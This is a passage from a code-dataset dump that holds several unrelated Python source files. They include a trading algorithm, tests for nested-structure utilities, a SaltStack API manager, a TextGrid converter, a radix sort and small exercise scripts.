Should be applied to every row of a dataframe. Reaches for the past thirty days of each dataframe,\n appends the data to a string, returns the string which should be unpacked later on.\n\n \"\"\"\n # Instantiate variables\n past_data = []\n # The current date is the name of the Series (row) being passed in \n current_date = row.name\n # print (\"current_date \", current_date)\n # Iterate through the number of dates from 0->num_dates\n for i in range(num_dates):\n # How many days to get back, calls get_day_delta for accurate delta assessment\n day_delta = get_day_delta(current_date)\n # print (\"day delta \", day_delta)\n # Get the current_date and update the current_date to minus day_delta from the date\n # To get the appropriate past date\n current_date = current_date - timedelta(days=day_delta)\n #print (\"changed current_date \", current_date)\n try:\n #: Get the price at the given current_date found by get_day_delta\n data = df.iloc[current_date]['sentiment']\n # print (\"current date \", current_date, \"data \" ,data)\n past_data.append(data)\n \n data = df.iloc[current_date]['sentiment high']- df.iloc[current_date]['sentiment low']\n past_data.append(data)\n \n data = df.iloc[current_date]['news volume']\n past_data.append(data)\n \n data = df.iloc[current_date]['news buzz']\n past_data.append(data)\n \n #print (\"past data \" ,past_data)\n except KeyError:\n #: No data for this date, pass\n pass\n # print str(past_data)\n \n # Return the a list made into a string\n return str(past_data)\n\ndef post_func(df): \n df = pd.DataFrame(df)\n df['past_data'] = df.apply(lambda row: fill_func(df, row, 99), axis=1)\n \n return df\n\ndef initialize(context):\n set_symbol_lookup_date('2018-10-21')\n ## Initialize list of securities we want to trade\n context.security_list = symbol('AAPL')\n \n ## Trailing stop loss\n context.stop_loss_pct = 0.995\n \n # We will weight each asset equally and leave a 5% cash\n # reserve. - actually this is sort of good idea\n context.weight = 0.95 / len(context.security_list)\n \n context.investment_size = (context.portfolio.cash*context.weight) \n\n context.historical_bars = 100\n context.feature_window = 3\n \n schedule_function(myfunc, date_rules.every_day(), \n time_rules.market_open(hours=0, minutes=1))\n \ndef myfunc(context, data):\n price_history = data.history(context.security_list, fields=\"price\", bar_count=100, frequency=\"1d\")\n \n try: \n # For loop for each stock traded everyday:\n for s in context.security_list:\n \n start_bar = context.feature_window\n price_list = price_history[s].tolist()\n past = data.current(s,'past_data')\n pastlist = custom_split(past)\n\n X = []\n y = []\n \n bar = start_bar\n \n # Loop for each machine learning data set\n while bar < len(price_list)-1:\n \n # print s,\" price: \",data.history(s, 'price', 100 , \"1d\")\n try: \n end_price = price_list[bar]\n start_price = price_list[bar-1]\n \n features = pastlist[(bar-3)*4: bar*4]\n # Featuers are the attribute value used for machine learning.\n #print(features)\n \n if end_price > start_price:\n label = 1\n else:\n label = -1\n # Label is the indicator of whether this stock will rise or fall\n bar +=1 \n \n X.append(features)\n y.append(label)\n \n #print X \n #print y\n \n except Exception as e:\n \n bar +=1\n print(('feature creation', str(e)))\n \n print ('len(X1)',len(X))\n \n # Call the machined learning model\n clf1 = RandomForestClassifier(n_estimators=100)\n clf2 = LinearSVC()\n clf3 = NuSVC()\n clf4 = LogisticRegression()\n \n # Rrepare the attribute information for prediction\n current_features=pastlist[384:396]\n \n X.append(current_features)\n print ('len(X2)',len(X))\n \n # Rescall all the data\n X = preprocessing.scale(X)\n \n current_features = X[-1:]\n X = X[:-1]\n \n #print current_features\n print ('len(X)',len(X))\n print ('len(y)',len(y))\n \n # Build the model\n clf1.fit(X,y)\n clf2.fit(X,y)\n clf3.fit(X,y)\n clf4.fit(X,y)\n \n # Predict the results \n p1 = clf1.predict(current_features)[0]\n p2 = clf2.predict(current_features)[0]\n p3 = clf3.predict(current_features)[0]\n p4 = clf4.predict(current_features)[0]\n \n # If 3 out of 4 prediction votes for one same results, this results will be promted to be the one I will use. \n if Counter([p1,p2,p3,p4]).most_common(1)[0][1] >= 3:\n p = Counter([p1,p2,p3,p4]).most_common(1)[0][0]\n \n else: \n p = 0\n \n print(('Prediction',p)) \n \n current_price = data.current(s, 'price')\n current_position = context.portfolio.positions[s].amount\n cash = context.portfolio.cash\n \n open_orders = get_open_orders()\n \n # Everyday's trading activities: \n if (p == 1):\n if s not in open_orders:\n order_target_percent(s, context.weight, style=StopOrder(context.stop_loss_pct*current_price))\n cash-=context.investment_size\n elif (p == -1):\n if s not in open_orders:\n order_target_percent(s,-context.weight)\n \n except Exception as e:\n print(str(e)) \n\n\"\"\"\ndef handle_data(context, data):\n #Plot variables at the end of each day.\n \n long_count = 0\n short_count = 0\n\n for position in context.portfolio.positions.itervalues():\n if position.amount > 0:\n long_count += 1\n if position.amount < 0:\n short_count += 1\n \n record(num_long=long_count, num_short=short_count, leverage=context.account.leverage)\n\"\"\"","sub_path":"skrt.py","file_name":"skrt.py","file_ext":"py","file_size_in_byte":8600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"291649729","text":"#!/usr/bin/env python3.6\r\n#Author: Sebastian A. Ellefsen\r\nimport math\r\nimport sys\r\n\r\nclass FuckOff(Exception):\r\n def __init__(self, value):\r\n self.value = value\r\n def __str__(self):\r\n return repr(self.value)\r\n\r\ndef tetVol(height):\r\n volume = (math.sqrt(2)*(a(height)**3))/12\r\n return volume\r\n\r\ndef tetArea(height):\r\n area = math.sqrt(3)*(a(height)**2)\r\n return area\r\n\r\ndef a(height): # Added to follow DRY principle\r\n return (3/(math.sqrt(6)))*height\r\n\r\ni = input('Skriv inn en høyde: ')\r\n\r\ntry:\r\n i = float(i)\r\n\r\n if(i<0):\r\n raise FuckOff(\"Fuck off!\")\r\n\r\nexcept ValueError:\r\n print(i, 'er ikke et nummer!')\r\n exit()\r\nexcept FuckOff as err:\r\n print('An error occured:',err.value)\r\n exit()\r\nexcept:\r\n print('Something went horribly wrong:', sys.exec_info()[0])\r\n exit()\r\n\r\nprint('Et tetraheder med høyde', i, 'har volum', tetVol(i), 'og areal', tetArea(i))\r\n","sub_path":"oving_1/tetraeder.py","file_name":"tetraeder.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"627469150","text":"import logging\nimport models\nimport helpers\n\nclass GistPyObject(object):\n def __init__(self, gist):\n logging.info(\"New GistPyObject for id: %s\", gist.id)\n self.files = []\n self.id = gist.id\n self.url = gist.url\n self.owner = gist.owner\n self.description = gist.description\n for file in gist.files:\n self.files.append(File(file))\n\nclass File(object):\n def __init__(self, file):\n self.compilers = models.Compiler.get(keys=file.compilers)\n\n self.name = file.name\n self.language = file.language\n self.formatted_contents = file.formatted_contents\n self.contents = file.contents\n self.output = file.output\n self.id = file.id\n self.stylesheet = file.stylesheet\n self.output_url = file.output_url\n\n self.details = models.ResultDetails.get_by_key_name(helpers.make_key_name(\"result\", file.id))\n\nclass RunResultDetails(object):\n def __init__(self, details):\n self.datetime = details.datetime\n self.error = details.error\n self.langName = details.langName\n self.langVersion = details.langVersion\n self.langId = details.langId\n self.memory = details.memory\n self.output = details.output\n self.public = details.public\n self.result = details.result\n self.signal = details.signal\n self.stderr = details.stderr\n self.time = details.time\n self.link = details.link","sub_path":"rungist/RunGist/gistPyObject.py","file_name":"gistPyObject.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"647687600","text":"\"\"\"\nCollection of tests for templated general functions\n\"\"\"\n\n# global\nimport copy\nimport pytest\n\n# local\nimport ivy\nimport ivy.numpy\n\n\n# Helpers #\n# --------#\n\ndef _snai(n, idx, v):\n if len(idx) == 1:\n n[idx[0]] = v\n else:\n _snai(n[idx[0]], idx[1:], v)\n\n\ndef _mnai(n, idx, fn):\n if len(idx) == 1:\n n[idx[0]] = fn(n[idx[0]])\n else:\n _mnai(n[idx[0]], idx[1:], fn)\n\n\n# Tests #\n# ------#\n\n# index_nest\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': (((2,), (4,)), ((6,), (8,)))}}])\n@pytest.mark.parametrize(\n \"index\", [('a', 0, 0), ('a', 1, 0), ('b', 'c', 0), ('b', 'c', 1, 0)])\ndef test_index_nest(nest, index, dev_str, call):\n ret = ivy.index_nest(nest, index)\n true_ret = nest\n for i in index:\n true_ret = true_ret[i]\n assert ret == true_ret\n\n\n# set_nest_at_index\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': [[[2], [4]], [[6], [8]]]}}])\n@pytest.mark.parametrize(\n \"index\", [('a', 0, 0), ('a', 1, 0), ('b', 'c', 0), ('b', 'c', 1, 0)])\n@pytest.mark.parametrize(\n \"value\", [1])\ndef test_set_nest_at_index(nest, index, value, dev_str, call):\n nest_copy = copy.deepcopy(nest)\n ivy.set_nest_at_index(nest, index, value)\n _snai(nest_copy, index, value)\n assert nest == nest_copy\n\n\n# map_nest_at_index\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': [[[2], [4]], [[6], [8]]]}}])\n@pytest.mark.parametrize(\n \"index\", [('a', 0, 0), ('a', 1, 0), ('b', 'c', 0, 0, 0), ('b', 'c', 1, 0, 0)])\n@pytest.mark.parametrize(\n \"fn\", [lambda x: x + 2, lambda x: x**2])\ndef test_map_nest_at_index(nest, index, fn, dev_str, call):\n nest_copy = copy.deepcopy(nest)\n ivy.map_nest_at_index(nest, index, fn)\n _mnai(nest_copy, index, fn)\n assert nest == nest_copy\n\n\n# multi_index_nest\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': (((2,), (4,)), ((6,), (8,)))}}])\n@pytest.mark.parametrize(\n \"multi_indices\", [(('a', 0, 0), ('a', 1, 0)), (('b', 'c', 0), ('b', 'c', 1, 0))])\ndef test_multi_index_nest(nest, multi_indices, dev_str, call):\n rets = ivy.multi_index_nest(nest, multi_indices)\n true_rets = list()\n for indices in multi_indices:\n true_ret = nest\n for i in indices:\n true_ret = true_ret[i]\n true_rets.append(true_ret)\n assert rets == true_rets\n\n\n# set_nest_at_indices\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': [[[2], [4]], [[6], [8]]]}}])\n@pytest.mark.parametrize(\n \"indices\", [(('a', 0, 0), ('a', 1, 0)), (('b', 'c', 0), ('b', 'c', 1, 0))])\n@pytest.mark.parametrize(\n \"values\", [(1, 2)])\ndef test_set_nest_at_indices(nest, indices, values, dev_str, call):\n nest_copy = copy.deepcopy(nest)\n ivy.set_nest_at_indices(nest, indices, values)\n\n def snais(n, idxs, vs):\n [_snai(n, index, value) for index, value in zip(idxs, vs)]\n\n snais(nest_copy, indices, values)\n\n assert nest == nest_copy\n\n\n# map_nest_at_indices\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': [[[2], [4]], [[6], [8]]]}}])\n@pytest.mark.parametrize(\n \"indices\", [(('a', 0, 0), ('a', 1, 0)), (('b', 'c', 0, 0, 0), ('b', 'c', 1, 0, 0))])\n@pytest.mark.parametrize(\n \"fn\", [lambda x: x + 2, lambda x: x**2])\ndef test_map_nest_at_indices(nest, indices, fn, dev_str, call):\n nest_copy = copy.deepcopy(nest)\n ivy.map_nest_at_indices(nest, indices, fn)\n\n def mnais(n, idxs, vs):\n [_mnai(n, index, fn) for index in idxs]\n\n mnais(nest_copy, indices, fn)\n\n assert nest == nest_copy\n\n\n# nested_indices_where\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': [[[2], [4]], [[6], [8]]]}}])\ndef test_nested_indices_where(nest, dev_str, call):\n indices = ivy.nested_indices_where(nest, lambda x: x < 5)\n assert indices[0] == ['a', 0, 0]\n assert indices[1] == ['a', 1, 0]\n assert indices[2] == ['b', 'c', 0, 0, 0]\n assert indices[3] == ['b', 'c', 0, 1, 0]\n","sub_path":"ivy_tests/test_core/test_nest.py","file_name":"test_nest.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"305961155","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n### Aufgabe 1 : Strings ###\n\nmyStrings = {}\ndata = np.genfromtxt(\"Daten/Data6_2.txt\", dtype = str, delimiter = '\\t')\n\nprint(data)\n\nfor entry in data:\n try:\n myStrings[entry] +=1\n except KeyError:\n myStrings[entry] = 1\nprint(myStrings)\n\n\n### Aufgabe 2 : Daten regridden ###\n\ndef regridArray(Array, Column, Grid):\n \"\"\"\n This function returns a new version of a numpy Array where data are\n averaged within boxes of a given grid. The new array contains the average\n value of the datapoints within each gridbox. If the datapoints coincide\n with the gridpoints this function reduces to a simple average.\n\n Parameters\n ----------\n Array : numpy Array\n numpy Array that contains separate data in columns\n Column : integer\n integer number of the column to which the array will be regridded\n Grid: 1D numpy Array\n Array that contains the gridpoints\n select = Grid(i)<= Array(:,Column) & Array(:,Column)< Grid(i+1)\n\n Returns\n ------\n result : numpy Array\n a numpy array that contains the regridded Array\n\n Example\n -------\n\n >>> AllDataAveraged =regridArray(AllDataNormalized,0,TimeGrid)\n\n This returns a numpy array that is regridded according to column 1 and the\n specified TimeGrid.\n\n \"\"\"\n\n time = Array[:, Column]\n ArrayTemp = Array\n ArrayNew = np.zeros((np.size(Grid), 2))\n ArrayNew[:, 0] = Grid\n counter = 0\n for t in range(np.size(Grid) - 1):\n select1 = time >= Grid[t]\n select2 = time < Grid[t + 1]\n select = select1 & select2\n if np.sum(select) <= 0.:\n ArrayNew = np.delete(ArrayNew, t - counter, 0)\n counter += 1\n else:\n ArrayNew[t - counter, 1] = np.mean(ArrayTemp[select, 1])\n\n return (ArrayNew)\n\n\n# Read Data\ndata = np.genfromtxt(\"MOKE.txt\", skip_header=1)\n\n# Create new Grid for Time\ngrid1 = np.linspace(-50, 0,2, endpoint=True)\ngrid2 = np.linspace(0, 1,5, endpoint=True)\ngrid3 = np.linspace(1, 100,10, endpoint=True)\ngrid4 = np.linspace(100, 1000, 50, endpoint=True)\ngrid = np.concatenate((grid1, grid2, grid3, grid4), axis=0)\n\n# Call regrid function, returns new Array\ndata_regrid = regridArray(data, 0, grid)\n\n# Plot Old vs New Array\nplt.plot(data[:, 0]-180, data[:, 1], label=('Original'))\nplt.plot(data_regrid[:, 0]-180, data_regrid[:, 1], 'o', label=('New Grid'))\nplt.legend()\nplt.title(\"MOKE Signal\")\nplt.xlabel(\"time (ps)\")\nplt.ylabel(\"Intensity (a.u.)\")\nplt.show()\nplt.savefig(\"RegridExample.png\")","sub_path":"Lecture05/Übung03_Aufgabe2_Lösung.py","file_name":"Übung03_Aufgabe2_Lösung.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"541890785","text":"# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom collections import defaultdict\n\nfrom datetime import datetime\nfrom pepper.libpepper import Pepper\nfrom tcp_tests import settings\nfrom tcp_tests import logger\nfrom tcp_tests.managers.execute_commands import ExecuteCommandsMixin\n\nLOG = logger.logger\n\n\nclass SaltManager(ExecuteCommandsMixin):\n \"\"\"docstring for SaltManager\"\"\"\n\n __config = None\n __underlay = None\n _map = {\n 'enforceState': 'enforce_state',\n 'enforceStates': 'enforce_states',\n 'runState': 'run_state',\n 'runStates': 'run_states',\n }\n\n def __init__(self, config, underlay, host=None, port='6969'):\n self.__config = config\n self.__underlay = underlay\n self.__port = port\n self.__host = host\n self.__api = None\n self.__user = settings.SALT_USER\n self.__password = settings.SALT_PASSWORD\n self._salt = self\n\n super(SaltManager, self).__init__(config=config, underlay=underlay)\n\n def install(self, commands):\n # if self.__config.salt.salt_master_host == '0.0.0.0':\n # # Temporary workaround. Underlay should be extended with roles\n # salt_nodes = self.__underlay.node_names()\n # self.__config.salt.salt_master_host = \\\n # self.__underlay.host_by_node_name(salt_nodes[0])\n\n self.execute_commands(commands=commands,\n label=\"Install and configure salt\")\n\n @property\n def port(self):\n return self.__port\n\n @property\n def host(self):\n if self.__host:\n return self.__host\n else:\n # TODO(ddmitriev): consider to add a check and raise\n # exception if 'salt_master_host' is not initialized.\n return self.__config.salt.salt_master_host\n\n @property\n def api(self):\n def login():\n LOG.info(\"Authentication in Salt API\")\n self.__api.login(\n username=self.__user,\n password=self.__password,\n eauth='pam')\n return datetime.now()\n\n if self.__api:\n if (datetime.now() - self.__session_start).seconds < 5 * 60:\n return self.__api\n else:\n # FIXXME: Change to debug\n LOG.info(\"Session's expired\")\n self.__session_start = login()\n return self.__api\n\n url = \"http://{host}:{port}\".format(\n host=self.host, port=self.port)\n LOG.info(\"Connecting to Salt API {0}\".format(url))\n self.__api = Pepper(url)\n self.__session_start = login()\n return self.__api\n\n def local(self, tgt, fun, args=None, kwargs=None):\n return self.api.local(tgt, fun, args, kwargs, expr_form='compound')\n\n def local_async(self, tgt, fun, args=None, kwargs=None):\n return self.api.local_async(tgt, fun, args, kwargs)\n\n def lookup_result(self, jid):\n return self.api.lookup_jid(jid)\n\n def check_result(self, r):\n if len(r.get('return', [])) == 0:\n raise LookupError(\"Result is empty or absent\")\n\n result = r['return'][0]\n if len(result) == 0:\n raise LookupError(\"Result is empty or absent\")\n LOG.info(\"Job has result for %s nodes\", result.keys())\n fails = defaultdict(list)\n for h in result:\n host_result = result[h]\n LOG.info(\"On %s executed:\", h)\n if isinstance(host_result, list):\n fails[h].append(host_result)\n continue\n for t in host_result:\n task = host_result[t]\n if task['result'] is False:\n fails[h].append(task)\n LOG.error(\"%s - %s\", t, task['result'])\n else:\n LOG.info(\"%s - %s\", t, task['result'])\n\n return fails if fails else None\n\n def enforce_state(self, tgt, state, args=None, kwargs=None):\n r = self.local(tgt=tgt, fun='state.sls', args=state)\n f = self.check_result(r)\n return r, f\n\n def enforce_states(self, tgt, state, args=None, kwargs=None):\n rets = []\n for s in state:\n r = self.enforce_state(tgt=tgt, state=s)\n rets.append(r)\n return rets\n\n def run_state(self, tgt, state, args=None, kwargs=None):\n return self.local(tgt=tgt, fun=state, args=args, kwargs=kwargs), None\n\n def run_states(self, tgt, state, args=None, kwargs=None):\n rets = []\n for s in state:\n r = self.run_state(tgt=tgt, state=s, args=args, kwargs=kwargs)\n rets.append(r)\n return rets\n\n def get_pillar(self, tgt, pillar):\n result = self.local(tgt=tgt, fun='pillar.get', args=pillar)\n return result['return']\n","sub_path":"tcp_tests/managers/saltmanager.py","file_name":"saltmanager.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357142431","text":"\nimport os\nimport sys\nfrom collections import defaultdict\nfrom textgrid import TextGrid, IntervalTier\n\ndef parse_ctm(ctm_path):\n file_dict = defaultdict(list)\n with open(ctm_path, 'r') as f:\n for line in f:\n line = line.strip()\n line = line.split(' ')\n filename = line[0]\n begin = float(line[2])\n duration = float(line[3])\n end = round(begin + duration, 2)\n label = line[4]\n file_dict[filename].append([begin, end, label])\n return file_dict\n\ndef find_max(input):\n return max(x[1] for x in input)\n\ndef ctm_to_textgrid(directory, out_directory):\n word_path = os.path.join(directory, 'word_ctm')\n if not os.path.exists(word_path):\n return\n phone_path = os.path.join(directory, 'phone_ctm')\n current = None\n word_dict = parse_ctm(word_path)\n phone_dict = parse_ctm(phone_path)\n num_files = len(word_dict)\n for i,(k,v) in enumerate(word_dict.items()):\n print('processing file {} of {}'.format(i,num_files))\n maxtime = find_max(v+phone_dict[k])\n tg = TextGrid(maxTime = maxtime)\n wordtier = IntervalTier(name = 'words', maxTime = maxtime)\n phonetier = IntervalTier(name = 'phones', maxTime = maxtime)\n for interval in v:\n wordtier.add(*interval)\n for interval in phone_dict[k]:\n phonetier.add(*interval)\n tg.append(wordtier)\n tg.append(phonetier)\n outpath = os.path.join(out_directory, k + '.TextGrid')\n tg.write(outpath)\n\nif __name__ == '__main__':\n base_dir = os.path.expanduser('~/dev/kaldi-trunk/egs/gp/s5/exp/GE')\n output_dir = os.path.expanduser('~/Documents/Data/GlobalPhone/German/aln')\n for d in os.listdir(base_dir):\n print(d)\n in_dir = os.path.join(base_dir, d)\n out_dir = os.path.join(output_dir, d)\n if not os.path.exists(out_dir):\n os.mkdir(out_dir)\n ctm_to_textgrid(in_dir,out_dir)\n\n\n\n","sub_path":"german-alignment/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222141073","text":"from math import *\nfrom constants import *\nimport numpy as np\nimport coordinates\nimport matplotlib.pyplot as plt\nfrom reactionforces import *\n\n\"\"\"\nCalculation of the torsion due to Fact, P and q around hinge 2 check if that's okay\nthese are split up in the u,v,w components of the'new' reference frame\n\"\"\"\ndef heaviside(x):\n if x < 0:\n return 0\n elif x >= 0:\n return 1\nF_act = 39.72774618*1000 \ntheta_r = radians(theta) #convert degrees to radians\nq_w = 0#sin(theta_r) * q #z_component of q\nq_v = cos(theta_r) * q #y_component of q\nP_w = cos(theta_r) * P #z_component of P\nP_v = sin(theta_r) * P #y_component of P\nFact_w = cos(theta_r) * F_act #z_component of jammed actuator\nFact_v = sin(theta_r) * F_act #y_component of jammed actuator\n\n\nlstep = .001 #define spanwise step\nx = np.arange(0, l_a + lstep, lstep) #create array of x points spanwise\nT = []\nT2 = []\nxx = []\nfor x in np.arange(0, l_a + lstep, lstep):\n T.append(-1*Fact_v * (h/2) * (heaviside(x-(x_2 - x_a / 2.))) + Fact_w * (h/2) * (heaviside(x-(x_2 - x_a / 2.))) + P_v * (h/2) * (heaviside(x-(x_2 + x_a / 2.))) - P_w * (h/2) * (heaviside(x-(x_2 + x_a / 2.))) + q_v * x* (-1 * (0.25*C_a - h/2.)))\n xx.append(x*1000)\n T2.append(( Fact_w * (h/2) * (heaviside(x-(x_2 - x_a / 2.))) - P_w * (h/2) * (heaviside(x-(x_2 + x_a / 2.))) + q_v * x* (-1 * (0.25*C_a - h/2.))))\n \nplt.plot(xx ,T, label= \"Y and Z components \")\nplt.plot(xx, T2, label = \"Only Y components\")\nplt.ylabel(\"Torsion [Nm]\")\nplt.xlabel(\"Span wise location with origin at wingtip close to hinge 1\")\nplt.legend()\nplt.show()\n\narea_1 = pi * (h/2)**2 /2 #enclosed areas of cell 1 and two\narea_2 = (C_a- h/2) * h\ns_semi = pi* h/2 / t_sk #integral parts of formula of semi circle \ns_rib = h / t_sp #integral parts of formula of rib \ns_TE = coordinates.coordinate(C_a, h/2, n_st)[2]*2 / t_sk #integral parts of formula of part with straight lines \n\ndef shear_torque(T, s_semi, s_rib, s_TE, area_1, area_2):\n \"\"\"\n find shear flow due to torsion; cell 1 is semicircular part, cell2 is TE\n deflection cell 1 = deflection cell 2 \n and T = Tcell_1 + Tcell_2 \n now you can solve #see page 613 of Megson aircraft structures\n matrix [qcell_1, qcell_2]\n s_.. = distance of element / thickness\n \"\"\"\n q_T = []\n for i in range(0, len(T)): #for all x as before calculate shear 1 and two\n A = np.array([[(s_semi + s_rib)/(2*area_1*G)+ (s_rib)/(2*area_2*G), -1*((s_TE + s_rib)/(2*area_2*G) + (s_rib)/(2*area_1*G))], [2*area_1, 2*area_2]])\n B = np.array([0, T[i]])\n q1_T, q2_T = np.linalg.solve(A,B)\n q_T.append([q1_T, q2_T]) \n return q_T\nq_T = shear_torque(T, s_semi, s_rib, s_TE, area_1, area_2)\n\ndef theta(q_T, lstep): #gives the angle at all location\n \"\"\"split up as twist at actuator 1 is zero\"\"\"\n theta1 = [0]* (419)\n for i in range(417, -1, -1 ):\n d_theta_torque = (q_T[i][0]* (s_semi+s_rib) - q_T[i][1]*s_rib)/(2*area_1*G) * lstep\n theta1[i] = (d_theta_torque + theta1[i+1] )\n theta1.remove(0)\n theta2 = [0] \n for i in range(419 , len(q_T[:])):\n d_theta_torque = (q_T[i][0]* (s_semi+s_rib) - q_T[i][1]*s_rib)/(2*area_1*G) * lstep #p.613 formula megson where lstep = dz\n theta2.append(d_theta_torque + theta2[i-419])\n finaltheta = theta1 + theta2\n return (finaltheta)\n\ntheta_corrected = theta(q_T, lstep)\nplt.plot(xx, theta_corrected)#, xx, T)\n\ndef displacement_calc(theta, radius, dis_TE):\n displacementLE = []\n displacementTE = []\n for j in range(0, len(theta)):\n displacementLE.append( -1*theta[j]*radius)\n displacementTE.append(theta[j]* dis_TE)\n return [displacementLE, displacementTE]\ndisplacement = displacement_calc(theta_corrected, h/2, C_a -h/2)\n\n#plt.plot(xx, displacement[0], xx,displacement[1])\n \n\n\n","sub_path":"Torsion.py","file_name":"Torsion.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"333579129","text":"#!/usr/bin/env python3\nimport logging\n\nfrom genie.conf import Genie\n\nfrom os import path\nfrom os import mkdir\n\n# To handle errors with connections to devices\nfrom unicon.core import errors\n\n\ndef create_non_existing_dir(dir_path):\n if not path.exists(dir_path):\n try:\n mkdir(dir_path)\n except PermissionError as e:\n log.error(f'Unable to create directory: {dir_path}.'\n f'Insufficient privileges. Error: {e}')\n exit(1)\n\n\ndef write_commands_to_file(abs_filename, command_output):\n try:\n with open(abs_filename, \"w\") as file_output:\n file_output.write(command_output)\n\n except IOError as e:\n log.error(f'Unable to write output to file: {abs_filename}.'\n f'Due to error: {e}')\n exit(1)\n\n\ndef collect_device_commands(testbed, commands_to_gather, dir_name):\n abs_dir_path = path.join(path.dirname(__file__), dir_name)\n\n create_non_existing_dir(abs_dir_path)\n\n log.info('Starting to collect output of the commands')\n\n for device_name, device in testbed.devices.items():\n # get operating system of a device from pyats_testbed.yaml\n device_os = device.os\n device_path = path.join(abs_dir_path, device_name)\n create_non_existing_dir(device_path)\n\n try:\n device.connect(log_stdout=False)\n except errors.ConnectionError:\n log.error(f'Failed to establish connection to: {device.name}.'\n f'Check connectivity and try again.')\n continue\n\n if commands_to_gather.get(device_os):\n for command in commands_to_gather[device_os]:\n filename_command = command.replace(' ', '_')\n filename_command = filename_command.replace('*', 'all')\n filename = device_name + '_' + filename_command\n abs_filename = path.join(device_path, filename)\n log.info(f'filename: {abs_filename}')\n\n command_output = device.execute(command, log_stdout=True)\n\n write_commands_to_file(abs_filename, command_output)\n else:\n log.error(f'No commands for operating system: {device_os} '\n f'of device: {device_name} has been defined. '\n f'This device has been skipped. Specify list of commands'\n f' for {device_os} and try again.')\n continue\n\n\ndef main():\n global log\n format = '%(asctime)s - %(filename)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=format)\n\n log = logging.getLogger(__name__)\n\n testbed_filename = './pyats_testbed.yaml'\n testbed = Genie.init(testbed_filename)\n\n commands_to_gather = {\n 'asa': ['show inventory', 'show running-config', 'show route',\n 'show ospf neighbor', 'show license all'],\n 'iosxe': ['show inventory', 'show running-config',\n 'show ip route vrf *', 'show ip ospf neighbor',\n 'show license feature'],\n 'nxos': ['show inventory', 'show running-config',\n 'show ip route vrf all', 'show ip ospf neighbor vrf all',\n 'show license usage']}\n\n dir_name = 'gathered_commands'\n\n collect_device_commands(testbed, commands_to_gather, dir_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"labpyats/task5_labpyats.py","file_name":"task5_labpyats.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"186547600","text":"\ndef radix_sort(lst, base=10):\n def counting_sort(lst, digit, base):\n \tsize = len(lst)\n \toutput = [0]*size\n \tcount = [0]*base\n \tfor i in range(size):\n \t\tindex = int(lst[i]/digit)\n \t\tcount[index%base] += 1\n \tfor i in range(1,base): count[i]+=count[i-1]\n \tfor i in range(size-1,-1,-1):\n \t\tindex = int(lst[i]/digit)\n \t\toutput[count[index%base]-1] = lst[i]\n \t\tcount[index%base] -= 1\n \tfor i in range(size): lst[i]=output[i]\n maxval = max(lst)\n digit = 1\n while digit <= maxval:\n counting_sort(lst, digit, base)\n digit *= base\n","sub_path":"basic_code/radix_sort.py","file_name":"radix_sort.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"554148305","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport dace\nimport numpy as np\n\nN = 12\n\n\n@dace.program\ndef program(input, output):\n for t in range(3):\n\n @dace.map(_[0:N])\n def tasklet(i):\n a << input[i]\n b >> output(1, lambda a, b: a + b, 0)\n b = a\n\n\nif __name__ == \"__main__\":\n print('CR re-initialization test')\n\n A = np.random.rand(N)\n B = np.ndarray([1], dtype=A.dtype)\n B[0] = 100\n\n program(A, B)\n\n diff = abs(3 * np.sum(A) - B[0])\n print(\"Difference:\", diff)\n exit(0 if diff <= 1e-5 else 1)\n","sub_path":"tests/cr_reinit_test.py","file_name":"cr_reinit_test.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"547922122","text":"for tc in range(int(input())):\n N = int(input()) #Dimensi dari labirin\n P = input()\n myPath = []\n for char in P:\n if char == 'S':\n myPath.append('E')\n else:\n myPath.append('S')\n \n myPath = ''.join(myPath)\n print('Case #{}: {}'.format(tc+1, myPath))","sub_path":"Qualification Round 